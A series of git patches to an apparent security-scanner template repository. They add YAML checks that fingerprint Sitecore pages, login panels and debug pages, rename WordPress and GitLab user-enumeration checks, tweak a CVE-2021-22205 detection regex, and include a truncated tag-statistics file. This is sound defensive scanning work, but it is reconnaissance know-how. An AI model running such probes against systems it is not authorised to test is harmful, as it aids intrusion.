100644 technologies/sitecore-default-page.yaml diff --git a/technologies/sitecore-default-page.yaml b/technologies/sitecore-default-page.yaml new file mode 100644 index 0000000000..9c722a6b3d --- /dev/null +++ b/technologies/sitecore-default-page.yaml @@ -0,0 +1,23 @@ +id: sitecore-default-page +info: + name: Sitecore Default Page + author: DhiyaneshDK + severity: info + metadata: + shodan-query: http.title:"Welcome to Sitecore" + tags: tech + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Welcome to Sitecore" + + - type: status + status: + - 200 From e761c8856b9d4778410c8776a6b5b9537acc3e9d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Nov 2021 21:25:46 +0530 Subject: [PATCH 3376/4083] Create sitecore-login.yaml --- exposed-panels/sitecore-login.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/sitecore-login.yaml diff --git a/exposed-panels/sitecore-login.yaml b/exposed-panels/sitecore-login.yaml new file mode 100644 index 0000000000..f11217491c --- /dev/null +++ b/exposed-panels/sitecore-login.yaml @@ -0,0 +1,24 @@ +id: sitecore-login + +info: + name: SiteCore Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"Welcome to Sitecore"' + tags: panel,sitecore + +requests: + - method: GET + path: + - '{{BaseURL}}/sitecore/login/default.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - '/sitecore/shell/Themes/Standard/Default/Login.css' + + - type: status + status: + - 200 From acc8d46849be0f5d0887f3563d7e11b4fd2e9c1d Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 3 Nov 2021 17:43:48 +0000 Subject: [PATCH 3377/4083] Updates "whoami" regex Fixes #3060 --- cves/2021/CVE-2021-22205.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml index ba3b336ab1..9315682bf1 100644 --- a/cves/2021/CVE-2021-22205.yaml +++ b/cves/2021/CVE-2021-22205.yaml @@ -60,4 +60,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com' \ No newline at end of file + - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)' From be871b155c1632b0e9b2e81fdc25c5674d0b6500 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 3 Nov 2021 23:16:23 +0530 Subject: [PATCH 3378/4083] Create sitecore-debug-page.yaml --- misconfiguration/sitecore-debug-page.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 misconfiguration/sitecore-debug-page.yaml diff --git a/misconfiguration/sitecore-debug-page.yaml b/misconfiguration/sitecore-debug-page.yaml new file mode 100644 index 0000000000..af6c10e7ba --- /dev/null +++ b/misconfiguration/sitecore-debug-page.yaml @@ -0,0 +1,24 @@ +id: sitecore-debug-page + +info: + name: SiteCore Debug Page + author: dhiyaneshDK + severity: low + metadata: + shodan-query: 'http.title:"Welcome to Sitecore"' + tags: debug,sitecore + +requests: + - method: GET + path: + - "{{BaseURL}}/sitecore/'" + + matchers-condition: and + matchers: + - type: word + words: + - 'extranet\Anonymous' + + - type: status + status: + - 404 From aefa9e2fd1c493b5e2a30fe982128d0495fefe2a Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 3 Nov 2021 23:48:57 +0530 Subject: [PATCH 3379/4083] added workflow --- technologies/sitecore-default-page.yaml | 3 ++- workflows/sitecore-workflow.yaml | 13 +++++++++++++ 2 files changed, 15 insertions(+), 1 deletion(-) create mode 100644 workflows/sitecore-workflow.yaml diff --git a/technologies/sitecore-default-page.yaml b/technologies/sitecore-default-page.yaml index 9c722a6b3d..35fa8fb4a8 100644 --- a/technologies/sitecore-default-page.yaml +++ b/technologies/sitecore-default-page.yaml @@ -1,11 +1,12 @@ id: sitecore-default-page + info: name: Sitecore Default Page author: DhiyaneshDK severity: info metadata: shodan-query: http.title:"Welcome to Sitecore" - tags: tech + tags: tech,sitecore requests: - method: GET diff --git a/workflows/sitecore-workflow.yaml b/workflows/sitecore-workflow.yaml new file mode 100644 index 0000000000..cfeab5b32a --- /dev/null +++ b/workflows/sitecore-workflow.yaml @@ -0,0 +1,13 @@ +id: sitecore-workflow + +info: + name: SiteCore Security Checks + author: pdteam + description: A simple workflow that runs all SiteCore related nuclei templates on a given target. + +workflows: + - template: technologies/sitecore-default-page.yaml + - template: exposed-panels/sitecore-login.yaml + subtemplates: + - tags: vulnerabilities/sitecore-pre-auth-rce.yaml + - template: misconfiguration/sitecore-debug-page.yaml \ No newline at end of file From 903aacf357ccf78e4ee6a79adfde4a5620305195 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Wed, 3 Nov 2021 23:45:15 +0000 Subject: [PATCH 3380/4083] Updates wordpress-login.yaml The ID used in the template was incorrect and didn't match the title, making it hard to find if you're wanting to exclude it. --- exposed-panels/wordpress-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/wordpress-login.yaml b/exposed-panels/wordpress-login.yaml index 278c7a9113..1d9cdcd501 100644 --- a/exposed-panels/wordpress-login.yaml +++ b/exposed-panels/wordpress-login.yaml @@ -1,4 +1,4 @@ -id: wordpress-panel +id: wordpress-login info: name: WordPress Panel From 38d81648b9d22a7d633fdfc8f2084c4247a628d8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 4 Nov 2021 12:12:06 +0530 Subject: [PATCH 3381/4083] Update wordpress-login.yaml --- exposed-panels/wordpress-login.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/wordpress-login.yaml b/exposed-panels/wordpress-login.yaml index 1d9cdcd501..2d60a80d2e 100644 --- a/exposed-panels/wordpress-login.yaml +++ b/exposed-panels/wordpress-login.yaml @@ -1,8 +1,8 @@ id: wordpress-login info: - name: WordPress Panel - author: github.com/its0x08 + name: WordPress login + author: its0x08 severity: info tags: panel From 421624d732dfd1e3316d7208c4b41ded001982bd Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 4 Nov 2021 15:13:32 +0530 Subject: [PATCH 3382/4083] Added missing tags --- misconfiguration/gitlab/gitlab-user-enum.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/gitlab/gitlab-user-enum.yaml b/misconfiguration/gitlab/gitlab-user-enum.yaml index f269af255e..4357318f74 100644 --- a/misconfiguration/gitlab/gitlab-user-enum.yaml +++ b/misconfiguration/gitlab/gitlab-user-enum.yaml @@ -5,7 +5,7 @@ info: name: GitLab - User Enumeration severity: info reference: https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/malenames-usa-top1000.txt - tags: gitlab,enum,misconfig + tags: gitlab,enum,misconfig,fuzz requests: - raw: From 915bb09a8201495c852c6a8ceb101f3606f3bc49 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 4 Nov 2021 15:43:49 +0530 Subject: [PATCH 3383/4083] updating file name --- ...f-user-enumeration.yaml => wordpress-rdf-user-enum.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename vulnerabilities/wordpress/{rdf-user-enumeration.yaml => wordpress-rdf-user-enum.yaml} (84%) diff --git a/vulnerabilities/wordpress/rdf-user-enumeration.yaml b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml similarity index 84% rename from vulnerabilities/wordpress/rdf-user-enumeration.yaml rename to vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml index 8f6fe220a6..99f915cd45 100644 --- a/vulnerabilities/wordpress/rdf-user-enumeration.yaml +++ b/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml @@ -1,10 +1,10 @@ -id: rdf-user-enumeration +id: wordpress-rdf-user-enum info: name: Wordpress RDF User Enumeration author: r3dg33k severity: info - tags: wordpress + tags: wordpress,enum requests: - method: GET @@ -36,4 +36,4 @@ requests: part: body group: 1 regex: - - '<\/dc:creator>' + - '<\!\[CDATA\[(.*?)\]\]> Date: Thu, 4 Nov 2021 10:22:58 +0000 Subject: [PATCH 3384/4083] Auto Generated Templates Stats [Thu Nov 4 10:22:58 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1913 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 980 insertions(+), 955 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 37d4d126a4..d81ee2bf59 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":843},{"name":"lfi","count":348},{"name":"panel","count":292},{"name":"wordpress","count":260},{"name":"xss","count":260},{"name":"exposure","count":248},{"name":"rce","count":218},{"name":"tech","count":197},{"name":"wp-plugin","count":180},{"name":"cve2020","count":166},{"name":"cve2021","count":160},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":98},{"name":"cve2018","count":92},{"name":"token-spray","count":83},{"name":"iot","count":80},{"name":"apache","count":74},{"name":"oast","count":71},{"name":"takeover","count":70},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"cve2017","count":51},{"name":"file","count":51},{"name":"unauth","count":50},{"name":"network","count":44},{"name":"ssrf","count":42},{"name":"sqli","count":41},{"name":"cve2016","count":39},{"name":"","count":39},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"google","count":30},{"name":"cve2015","count":30},{"name":"logs","count":30},{"name":"jira","count":29},{"name":"atlassian","count":29},{"name":"cisco","count":28},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"auth-bypass","count":25},{"name":"generic","count":24},{"name":"misconfig","count":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"weblogic","count":15},{"name":"php","count":15},{"name":"cve2011","count":15},{"name":"devops","count":15},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"struts","count":14},{"name":"wp-theme","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"zoho","count":13},{"name":"dns","count":13},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"xxe","count":11},{"name":"magento","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"intrusive","count":10},{"name":"dell","count":10},{"name":"ibm","count":9},{"name":"vmware","count":9},{"name":"ftp","count":9},{"name":"gitlab","count":9},{"name":"kubernetes","count":9},{"name":"microsoft","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"airflow","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"rails","count":8},{"name":"cve2008","count":8},{"name":"cnvd","count":8},{"name":"netgear","count":7},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"camera","count":7},{"name":"solr","count":6},{"name":"prometheus","count":6},{"name":"citrix","count":6},{"name":"lucee","count":6},{"name":"jetty","count":6},{"name":"nodejs","count":6},{"name":"phpmyadmin","count":6},{"name":"fileupload","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"docker","count":6},{"name":"api","count":6},{"name":"drupal","count":6},{"name":"laravel","count":6},{"name":"thinkphp","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"symfony","count":5},{"name":"crlf","count":5},{"name":"circarlife","count":5},{"name":"printer","count":5},{"name":"wso2","count":5},{"name":"tomcat","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"jolokia","count":5},{"name":"fatpipe","count":4},{"name":"traversal","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"rfi","count":4},{"name":"symantec","count":4},{"name":"webserver","count":4},{"name":"strapi","count":4},{"name":"slack","count":4},{"name":"git","count":4},{"name":"zimbra","count":4},{"name":"buffalo","count":4},{"name":"samsung","count":4},{"name":"npm","count":4},{"name":"grafana","count":4},{"name":"microstrategy","count":4},{"name":"maps","count":4},{"name":"keycloak","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"zabbix","count":4},{"name":"glpi","count":4},{"name":"amazon","count":4},{"name":"solarwinds","count":4},{"name":"asp","count":4},{"name":"moodle","count":4},{"name":"proxy","count":4},{"name":"magmi","count":4},{"name":"exchange","count":4},{"name":"log","count":3},{"name":"lansweeper","count":3},{"name":"hoteldruid","count":3},{"name":"ebs","count":3},{"name":"smtp","count":3},{"name":"cves","count":3},{"name":"openam","count":3},{"name":"lfr","count":3},{"name":"oa","count":3},{"name":"ofbiz","count":3},{"name":"search","count":3},{"name":"r-seenet","count":3},{"name":"jeesns","count":3},{"name":"vbulletin","count":3},{"name":"minio","count":3},{"name":"sonicwall","count":3},{"name":"nacos","count":3},{"name":"cloud","count":3},{"name":"jellyfin","count":3},{"name":"springcloud","count":3},{"name":"bitrix","count":3},{"name":"telerik","count":3},{"name":"injection","count":3},{"name":"github","count":3},{"name":"itop","count":3},{"name":"opensis","count":3},{"name":"zhiyuan","count":3},{"name":"kevinlab","count":3},{"name":"exposures","count":3},{"name":"kafka","count":3},{"name":"cve2007","count":3},{"name":"cacti","count":3},{"name":"node","count":3},{"name":"linkerd","count":3},{"name":"fanruan","count":3},{"name":"tikiwiki","count":3},{"name":"caucho","count":3},{"name":"httpd","count":3},{"name":"targa","count":3},{"name":"openssh","count":3},{"name":"kibana","count":3},{"name":"bigip","count":3},{"name":"fpd","count":3},{"name":"azure","count":3},{"name":"mail","count":3},{"name":"nexus","count":3},{"name":"terramaster","count":3},{"name":"mongodb","count":3},{"name":"backdoor","count":3},{"name":"nosqli","count":3},{"name":"ssh","count":3},{"name":"druid","count":3},{"name":"bypass","count":2},{"name":"service","count":2},{"name":"dolibarr","count":2},{"name":"maian","count":2},{"name":"axis","count":2},{"name":"smb","count":2},{"name":"vcenter","count":2},{"name":"prestashop","count":2},{"name":"shellshock","count":2},{"name":"redis","count":2},{"name":"favicon","count":2},{"name":"jetbrains","count":2},{"name":"cache","count":2},{"name":"aspose","count":2},{"name":"phpstorm","count":2},{"name":"hashicorp","count":2},{"name":"netsweeper","count":2},{"name":"jsf","count":2},{"name":"spark","count":2},{"name":"mailchimp","count":2},{"name":"kong","count":2},{"name":"leak","count":2},{"name":"wordfence","count":2},{"name":"dos","count":2},{"name":"ecoa","count":2},{"name":"globalprotect","count":2},{"name":"hjtcloud","count":2},{"name":"upload","count":2},{"name":"rstudio","count":2},{"name":"liferay","count":2},{"name":"showdoc","count":2},{"name":"chyrp","count":2},{"name":"netis","count":2},{"name":"glassfish","count":2},{"name":"text","count":2},{"name":"icewarp","count":2},{"name":"seeyon","count":2},{"name":"payara","count":2},{"name":"avantfax","count":2},{"name":"ilo","count":2},{"name":"trixbox","count":2},{"name":"commax","count":2},{"name":"akkadian","count":2},{"name":"linkedin","count":2},{"name":"s3","count":2},{"name":"saltstack","count":2},{"name":"xxljob","count":2},{"name":"tidb","count":2},{"name":"nextcloud","count":2},{"name":"ec2","count":2},{"name":"geowebserver","count":2},{"name":"paloalto","count":2},{"name":"embed","count":2},{"name":"wuzhicms","count":2},{"name":"chiyu","count":2},{"name":"natshell","count":2},{"name":"fortios","count":2},{"name":"axis2","count":2},{"name":"hasura","count":2},{"name":"guacamole","count":2},{"name":"horde","count":2},{"name":"mida","count":2},{"name":"waf","count":2},{"name":"harbor","count":2},{"name":"getsimple","count":2},{"name":"linux","count":2},{"name":"sharepoint","count":2},{"name":"bitly","count":2},{"name":"openvpn","count":2},{"name":"emerge","count":2},{"name":"ecology","count":2},{"name":"justwriting","count":2},{"name":"webcam","count":2},{"name":"idea","count":2},{"name":"db","count":2},{"name":"activemq","count":2},{"name":"openemr","count":2},{"name":"aruba","count":2},{"name":"nextjs","count":2},{"name":"pega","count":2},{"name":"akamai","count":2},{"name":"zeroshell","count":2},{"name":"backups","count":2},{"name":"mcafee","count":2},{"name":"yapi","count":2},{"name":"middleware","count":2},{"name":"chamilo","count":2},{"name":"flir","count":2},{"name":"huawei","count":2},{"name":"lotus","count":2},{"name":"sonarqube","count":2},{"name":"qcubed","count":2},{"name":"prtg","count":2},{"name":"heroku","count":2},{"name":"yii","count":2},{"name":"hpe","count":2},{"name":"enumeration","count":2},{"name":"fortinet","count":2},{"name":"plesk","count":2},{"name":"kentico","count":2},{"name":"rockmongo","count":2},{"name":"status","count":2},{"name":"nagios","count":2},{"name":"bruteforce","count":2},{"name":"storage","count":2},{"name":"couchdb","count":2},{"name":"totemomail","count":2},{"name":"hostheader-injection","count":2},{"name":"openfire","count":2},{"name":"qihang","count":2},{"name":"idrac","count":2},{"name":"oauth","count":2},{"name":"voipmonitor","count":2},{"name":"cve2005","count":2},{"name":"igs","count":2},{"name":"electron","count":2},{"name":"adminer","count":2},{"name":"grav","count":2},{"name":"bucket","count":2},{"name":"vrealize","count":2},{"name":"jboss","count":2},{"name":"jeedom","count":2},{"name":"sitecore","count":2},{"name":"rocketchat","count":2},{"name":"splunk","count":2},{"name":"phpcollab","count":2},{"name":"odoo","count":2},{"name":"aviatrix","count":2},{"name":"ucmdb","count":2},{"name":"places","count":2},{"name":"frp","count":2},{"name":"rancher","count":2},{"name":"strava","count":1},{"name":"tpshop","count":1},{"name":"mirai","count":1},{"name":"bash","count":1},{"name":"novnc","count":1},{"name":"gurock","count":1},{"name":"commscope","count":1},{"name":"spf","count":1},{"name":"shopizer","count":1},{"name":"zookeeper","count":1},{"name":"logontracer","count":1},{"name":"couchbase","count":1},{"name":"find","count":1},{"name":"messaging","count":1},{"name":"ricoh","count":1},{"name":"dotnetnuke","count":1},{"name":"acme","count":1},{"name":"wamp","count":1},{"name":"salesforce","count":1},{"name":"octobercms","count":1},{"name":"drone","count":1},{"name":"jabber","count":1},{"name":"eprints","count":1},{"name":"lotuscms","count":1},{"name":"metinfo","count":1},{"name":"tieline","count":1},{"name":"goahead","count":1},{"name":"empirecms","count":1},{"name":"qvisdvr","count":1},{"name":"perl","count":1},{"name":"zmanda","count":1},{"name":"swagger","count":1},{"name":"zcms","count":1},{"name":"gateone","count":1},{"name":"nimble","count":1},{"name":"mysql","count":1},{"name":"processmaker","count":1},{"name":"eyelock","count":1},{"name":"jmx","count":1},{"name":"photo","count":1},{"name":"ssl","count":1},{"name":"solarlog","count":1},{"name":"node-red-dashboard","count":1},{"name":"kafdrop","count":1},{"name":"skycaiji","count":1},{"name":"netlify","count":1},{"name":"ecom","count":1},{"name":"achecker","count":1},{"name":"camunda","count":1},{"name":"weiphp","count":1},{"name":"miscrsoft","count":1},{"name":"mobileiron","count":1},{"name":"varnish","count":1},{"name":"fcm","count":1},{"name":"influxdb","count":1},{"name":"plugin","count":1},{"name":"jsp","count":1},{"name":"actuator","count":1},{"name":"subrion","count":1},{"name":"grails","count":1},{"name":"tor","count":1},{"name":"acontent","count":1},{"name":"onelogin","count":1},{"name":"hadoop","count":1},{"name":"mapbox","count":1},{"name":"buildkite","count":1},{"name":"turbocrm","count":1},{"name":"sar2html","count":1},{"name":"zyxel","count":1},{"name":"huijietong","count":1},{"name":"cockpit","count":1},{"name":"biometrics","count":1},{"name":"lanproxy","count":1},{"name":"instagram","count":1},{"name":"dbt","count":1},{"name":"ssltls","count":1},{"name":"woocommerce","count":1},{"name":"raspap","count":1},{"name":"ilo4","count":1},{"name":"livezilla","count":1},{"name":"smi","count":1},{"name":"svnserve","count":1},{"name":"tamronos","count":1},{"name":"lutron","count":1},{"name":"circleci","count":1},{"name":"speed","count":1},{"name":"rhymix","count":1},{"name":"geutebruck","count":1},{"name":"ns","count":1},{"name":"tracer","count":1},{"name":"interlib","count":1},{"name":"cors","count":1},{"name":"avtech","count":1},{"name":"openerp","count":1},{"name":"wmt","count":1},{"name":"dotclear","count":1},{"name":"okta","count":1},{"name":"directions","count":1},{"name":"gilacms","count":1},{"name":"springframework","count":1},{"name":"realteo","count":1},{"name":"key","count":1},{"name":"magicflow","count":1},{"name":"werkzeug","count":1},{"name":"database","count":1},{"name":"k8s","count":1},{"name":"sidekiq","count":1},{"name":"catfishcms","count":1},{"name":"synnefo","count":1},{"name":"feifeicms","count":1},{"name":"plone","count":1},{"name":"addpac","count":1},{"name":"alertmanager","count":1},{"name":"oneblog","count":1},{"name":"mantisbt","count":1},{"name":"fortigates","count":1},{"name":"redhat","count":1},{"name":"szhe","count":1},{"name":"bedita","count":1},{"name":"frontpage","count":1},{"name":"saltapi","count":1},{"name":"timesheet","count":1},{"name":"facebook","count":1},{"name":"xiuno","count":1},{"name":"openrestry","count":1},{"name":"alerta","count":1},{"name":"vscode","count":1},{"name":"codemeter","count":1},{"name":"jeewms","count":1},{"name":"pgadmin","count":1},{"name":"geolocation","count":1},{"name":"discourse","count":1},{"name":"dbeaver","count":1},{"name":"phpinfo","count":1},{"name":"ioncube","count":1},{"name":"dvwa","count":1},{"name":"trilithic","count":1},{"name":"webmin","count":1},{"name":"pulsesecure","count":1},{"name":"websphere","count":1},{"name":"websvn","count":1},{"name":"api-manager","count":1},{"name":"ghost","count":1},{"name":"acexy","count":1},{"name":"hubspot","count":1},{"name":"elascticsearch","count":1},{"name":"cofax","count":1},{"name":"idemia","count":1},{"name":"darkstat","count":1},{"name":"karel","count":1},{"name":"netgenie","count":1},{"name":"yzmcms","count":1},{"name":"doh","count":1},{"name":"gridx","count":1},{"name":"phalcon","count":1},{"name":"axiom","count":1},{"name":"blackboard","count":1},{"name":"exacqvision","count":1},{"name":"pihole","count":1},{"name":"elevation","count":1},{"name":"manager","count":1},{"name":"pivotaltracker","count":1},{"name":"vidyo","count":1},{"name":"nsasg","count":1},{"name":"cloudron","count":1},{"name":"cocoon","count":1},{"name":"particle","count":1},{"name":"twitter-server","count":1},{"name":"hiawatha","count":1},{"name":"domxss","count":1},{"name":"eg","count":1},{"name":"ruby","count":1},{"name":"exponentcms","count":1},{"name":"fontawesome","count":1},{"name":"zms","count":1},{"name":"email","count":1},{"name":"portainer","count":1},{"name":"starttls","count":1},{"name":"glowroot","count":1},{"name":"rsyncd","count":1},{"name":"rmi","count":1},{"name":"gogs","count":1},{"name":"weather","count":1},{"name":"cscart","count":1},{"name":"servicedesk","count":1},{"name":"buttercms","count":1},{"name":"graylog","count":1},{"name":"csod","count":1},{"name":"iceflow","count":1},{"name":"xml","count":1},{"name":"dotnet","count":1},{"name":"opm","count":1},{"name":"netmask","count":1},{"name":"jaspersoft","count":1},{"name":"sonarcloud","count":1},{"name":"newrelic","count":1},{"name":"yealink","count":1},{"name":"sureline","count":1},{"name":"ulterius","count":1},{"name":"gunicorn","count":1},{"name":"fedora","count":1},{"name":"phpunit","count":1},{"name":"nuuo","count":1},{"name":"zarafa","count":1},{"name":"deviantart","count":1},{"name":"diris","count":1},{"name":"lokalise","count":1},{"name":"dropbox","count":1},{"name":"mantis","count":1},{"name":"expose","count":1},{"name":"owa","count":1},{"name":"tugboat","count":1},{"name":"bookstack","count":1},{"name":"ewebs","count":1},{"name":"lancom","count":1},{"name":"netdata","count":1},{"name":"matrix","count":1},{"name":"timezone","count":1},{"name":"parentlink","count":1},{"name":"elfinder","count":1},{"name":"smartblog","count":1},{"name":"netrc","count":1},{"name":"openweather","count":1},{"name":"alibaba","count":1},{"name":"tcexam","count":1},{"name":"spectracom","count":1},{"name":"k8","count":1},{"name":"tink","count":1},{"name":"phpwiki","count":1},{"name":"luftguitar","count":1},{"name":"blue-ocean","count":1},{"name":"trane","count":1},{"name":"thinkadmin","count":1},{"name":"mediumish","count":1},{"name":"powercreator","count":1},{"name":"htmli","count":1},{"name":"plc","count":1},{"name":"nc2","count":1},{"name":"square","count":1},{"name":"javafaces","count":1},{"name":"opensmtpd","count":1},{"name":"gstorage","count":1},{"name":"faraday","count":1},{"name":"wooyun","count":1},{"name":"autocomplete","count":1},{"name":"centos","count":1},{"name":"mrtg","count":1},{"name":"razor","count":1},{"name":"tinypng","count":1},{"name":"beanshell","count":1},{"name":"scs","count":1},{"name":"redcap","count":1},{"name":"svn","count":1},{"name":"selea","count":1},{"name":"youtube","count":1},{"name":"dvr","count":1},{"name":"stem","count":1},{"name":"kindeditor","count":1},{"name":"csrf","count":1},{"name":"opencast","count":1},{"name":"mod-proxy","count":1},{"name":"ruckus","count":1},{"name":"soar","count":1},{"name":"wing-ftp","count":1},{"name":"details","count":1},{"name":"fuelcms","count":1},{"name":"maxsite","count":1},{"name":"robomongo","count":1},{"name":"centreon","count":1},{"name":"wondercms","count":1},{"name":"shopware","count":1},{"name":"securityspy","count":1},{"name":"qsan","count":1},{"name":"etouch","count":1},{"name":"pmb","count":1},{"name":"keenetic","count":1},{"name":"minimouse","count":1},{"name":"cse","count":1},{"name":"xampp","count":1},{"name":"forcepoint","count":1},{"name":"appveyor","count":1},{"name":"cve2006","count":1},{"name":"nweb2fax","count":1},{"name":"tenda","count":1},{"name":"javamelody","count":1},{"name":"rabbitmq","count":1},{"name":"wp","count":1},{"name":"myvuehelp","count":1},{"name":"openx","count":1},{"name":"nordex","count":1},{"name":"emc","count":1},{"name":"rujjie","count":1},{"name":"krweb","count":1},{"name":"linksys","count":1},{"name":"playable","count":1},{"name":"ipstack","count":1},{"name":"cerebro","count":1},{"name":"auth","count":1},{"name":"sourcebans","count":1},{"name":"jumpcloud","count":1},{"name":"paypal","count":1},{"name":"qdpm","count":1},{"name":"mautic","count":1},{"name":"wix","count":1},{"name":"kubeflow","count":1},{"name":"gsoap","count":1},{"name":"sentry","count":1},{"name":"dreamweaver","count":1},{"name":"sophos","count":1},{"name":"moin","count":1},{"name":"yachtcontrol","count":1},{"name":"limit","count":1},{"name":" default-login","count":1},{"name":"cloudinary","count":1},{"name":"blind","count":1},{"name":"fiori","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"74cms","count":1},{"name":"arl","count":1},{"name":"vercel","count":1},{"name":"moinmoin","count":1},{"name":"viewpoint","count":1},{"name":"sceditor","count":1},{"name":"artica","count":1},{"name":"primetek","count":1},{"name":"wavemaker","count":1},{"name":"ganglia","count":1},{"name":"vnc","count":1},{"name":"h3c-imc","count":1},{"name":"distance","count":1},{"name":"loganalyzer","count":1},{"name":"omi","count":1},{"name":"ambari","count":1},{"name":"owasp","count":1},{"name":"concrete","count":1},{"name":"cyberoam","count":1},{"name":"nexusdb","count":1},{"name":"spip","count":1},{"name":"python","count":1},{"name":"fastcgi","count":1},{"name":"bing","count":1},{"name":"kerbynet","count":1},{"name":"webadmin","count":1},{"name":"pagerduty","count":1},{"name":"checkpoint","count":1},{"name":"circle","count":1},{"name":"upnp","count":1},{"name":"listserv","count":1},{"name":"geocode","count":1},{"name":"csrfguard","count":1},{"name":"aura","count":1},{"name":"taiga","count":1},{"name":"oscommerce","count":1},{"name":"servicenow","count":1},{"name":"graphite","count":1},{"name":"triconsole","count":1},{"name":"totaljs","count":1},{"name":"scimono","count":1},{"name":"wavlink","count":1},{"name":"zm","count":1},{"name":"rubedo","count":1},{"name":"gloo","count":1},{"name":"ueditor","count":1},{"name":"jenzabar","count":1},{"name":"vsphere","count":1},{"name":"oidc","count":1},{"name":"tongda","count":1},{"name":"cloudflare","count":1},{"name":"zenario","count":1},{"name":"vsftpd","count":1},{"name":"roads","count":1},{"name":"aspnuke","count":1},{"name":"sage","count":1},{"name":"spring","count":1},{"name":"plastic","count":1},{"name":"optimizely","count":1},{"name":"craftcms","count":1},{"name":"froxlor","count":1},{"name":"spidercontrol","count":1},{"name":"postmark","count":1},{"name":"package","count":1},{"name":"secmail","count":1},{"name":"simplecrm","count":1},{"name":"xvr","count":1},{"name":"dnssec","count":1},{"name":"wildfly","count":1},{"name":"xmlchart","count":1},{"name":"proftpd","count":1},{"name":"okiko","count":1},{"name":"klog","count":1},{"name":"adafruit","count":1},{"name":"pippoint","count":1},{"name":"memcached","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"gotmls","count":1},{"name":"jenkin","count":1},{"name":"jnoj","count":1},{"name":"mongoshake","count":1},{"name":"sgp","count":1},{"name":"emby","count":1},{"name":"pcoip","count":1},{"name":"jitsi","count":1},{"name":"mara","count":1},{"name":"tinymce","count":1},{"name":"episerver","count":1},{"name":"bolt","count":1},{"name":"xunchi","count":1},{"name":"sprintful","count":1},{"name":"bazarr","count":1},{"name":"testrail","count":1},{"name":"sqlite","count":1},{"name":"lighttpd","count":1},{"name":"calendly","count":1},{"name":"accela","count":1},{"name":"seacms","count":1},{"name":"bigbluebutton","count":1},{"name":"shoppable","count":1},{"name":"mkdocs","count":1},{"name":"visualstudio","count":1},{"name":"sangfor","count":1},{"name":"ems","count":1},{"name":"solman","count":1},{"name":"tileserver","count":1},{"name":"iptime","count":1},{"name":"clickhouse","count":1},{"name":"anchorcms","count":1},{"name":"meraki","count":1},{"name":"postgres","count":1},{"name":"expn","count":1},{"name":"iterable","count":1},{"name":"chinaunicom","count":1},{"name":"timeclock","count":1},{"name":"landrayoa","count":1},{"name":"chevereto","count":1},{"name":"cves2001","count":1},{"name":"sterling","count":1},{"name":"travis","count":1},{"name":"streetview","count":1},{"name":"rdp","count":1},{"name":"opentsdb","count":1},{"name":"clockwatch","count":1},{"name":"ognl","count":1},{"name":"finereport","count":1},{"name":"fortilogger","count":1},{"name":"intercom","count":1},{"name":"weglot","count":1},{"name":"gitlist","count":1},{"name":"daybyday","count":1